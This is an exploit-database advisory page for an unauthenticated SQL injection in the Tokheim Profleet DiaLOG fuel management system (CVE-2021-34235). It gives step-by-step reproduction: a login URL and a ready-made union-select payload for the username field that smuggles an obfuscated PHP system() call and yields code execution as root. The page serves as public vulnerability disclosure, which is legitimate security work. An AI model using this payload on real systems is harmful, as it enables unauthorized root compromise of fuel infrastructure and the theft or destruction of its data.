Tokheim Profleet DiaLOG Fuel Management System 11.005.02 SQL Injection / Code Execution

2022.02.12
Credit: golem445
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated) # Date: 02/9/2022 # Exploit Author: golem445 # Vendor Homepage: https://www.tsg-solutions.com # Tested on: Kali Linux # CVE: CVE-2021-34235 # Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root. ==Steps to Reproduce== # Go to : http://dialog_host/login.php # Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -) # This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter. ==Notes== This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top